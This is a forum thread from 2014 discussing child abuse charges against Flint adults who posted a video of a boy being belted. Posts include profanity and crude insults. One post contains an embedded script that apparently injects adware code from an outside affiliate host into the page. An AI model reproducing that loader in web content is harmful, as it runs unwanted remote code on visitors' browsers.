Black Hair Media Forum Homepage
BHM BHM BHM
Forum Home Forum Home > Lets Talk > Talk, Talk, and More Talk
  FAQ FAQ  Forum Search   Register Register  Login Login
Extensions Plus

another video of parents beating a childs ass

Post Reply Post Reply Page  <1 56789>

Author
 Rating: Topic Rating: 4 Votes, Average 2.00  Topic Search Topic Search  Topic Options Topic Options
tatee View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (1) Thanks(1)   Quote tatee Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 9:52am
Originally posted by bunzaveli bunzaveli wrote:

i dont think the guy in the middle is gonna make it, he doesnt look like he about that life.

he was talking reckless a minute ago thoLOL
Sponsored Links

ms_wonderland View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote ms_wonderland Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 10:17am
Originally posted by fckwitmeuknoigotit fckwitmeuknoigotit wrote:

looks like the public spoke up for the kid and got the authorities involvedClap

Facebook video leads to child abuse charges for Flint mother, 2 others

Flint (Not Detroit )Michigan mother and two others are charged with child abuse after being accused of hitting an 11-year-old boy more than 50 times with a belt and later posting the video on Facebook.

Genesee County Prosecutor David Leyton said the boy’s mother, 28-year-old Demitria Latrion Powell of Flint, is charged with three counts of third-degree child abuse.

Uteas Michelle Taylor, 42, Stefon Tirrell Felton, 39, both of Flint,  are also charged with third-degree child abuse.

The video, from April 3, shows the boy holding onto a chair while he is smacked in the face and hit with the belt. The adults warn him not to get involved in gang activity.

Leyton said the boy was being punished, but the parents “went beyond what is a reasonable level of parental discipline.”

Leyton said he was “disturbed” after watching the video.

The video was shared more than 1,000 times on Facebook, and eventually got the attention of Flint police and the Michigan Department of Human Services.

“What the video in this case reveals is a group of adults whose actions were a criminal assault against a child and that behavior cannot be condoned nor allowed under the law,” Leyton said.

The boy and an infant that was also in the home have been taken into protective custody. 

Yesssss, there is a God.  50 times???? Was it said that this was ok except for filming(not on pc, not going back)?? Let this be a lesson to some of y'all.  Disgusting.
SeducTress View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (2) Thanks(2)   Quote SeducTress Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 10:42am
Good

Fukking savages

Beating on that baby, crowded around him, cheering, and leering

That ish was sadistic, and the "uncles" comments were alarming.

afrokock View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote afrokock Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 2:51pm
this is a positive outcome

beautiful-stranger View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote beautiful-stranger Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 2:52pm
I mean i got beat with a belt till i had welts on my back, doubt my momma would have put it on fb
ModelessDiva View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote ModelessDiva Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 3:16pm
welp thats what they get

and moral of the story is...whenever you feel like posting ratchet videos in ratchet settings with ratchet people on the web...dontBig smile
sexyandfamous View Drop Down
VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote sexyandfamous Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 3:24pm
Good. I did not watch it and don't intend to. I don't get why they would want to post a video of beating a child on the internet. Great, you don't want him to be a thug - but beating him is the way to go? Humiliating him by posting it online is ideal? What if someone saved that video and tomorrow when he goes to his new school (since he most likely will be sent to foster care), plays the recording in front of him for a crowd of kids to watch and laugh at it?
I mean spank your child if you think is the way to go, but 50 times? WTF
kfoxx1998 View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (1) Thanks(1)   Quote kfoxx1998 Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 3:58pm
I hate the idea of children getting spankings that only serve the purpose of allowing the adult to "work out" their anger.  Its pointless and abusive.  The insertion of the video recording immediately required the adults to put on an act of complete humiliation.  A few butt whops, no camera, no audience would have sufficed but what they did was put on an exhibition at the child's expense.  I'm so sorry but a night in jail is probably not going to teach them anything at all.  They will blame him for it I'm sure.  Nobody will apologize to the baby for them using him to demonstrate how clever they are. 
bunzaveli View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote bunzaveli Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 4:13pm
so the only issue is the camera with a lot of posters ? thats the real problem ? reminds me of what someone once told me about domestic violence, i think it went like, "beat your wife at home, not in front of me"

OhMyCurlz View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote OhMyCurlz Quote  Post ReplyReply Direct Link To This Post Posted: Apr 10 2014 at 4:13pm
I bet her dumb ass mad that she screamed out "Call CPS!!" now. 

Stupid h0

(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://forum.blackhairmedia.com/RTE_textarea.asp?mode=edit&ID=10813775&CACHE=1628') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-open&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();

Edited by OhMyCurlz - Apr 10 2014 at 4:21pm
Get Longer Healthier Faster Growing Hair
Get Healthier Stronger Longer Hair
Glam Twinz
Human Hair Wigs
Wefting Training
Brazilian Hair
Brazilian Hair
Wig and Hair Extension on Amazon
 Post Reply Post Reply Page  <1 56789>
  Share Topic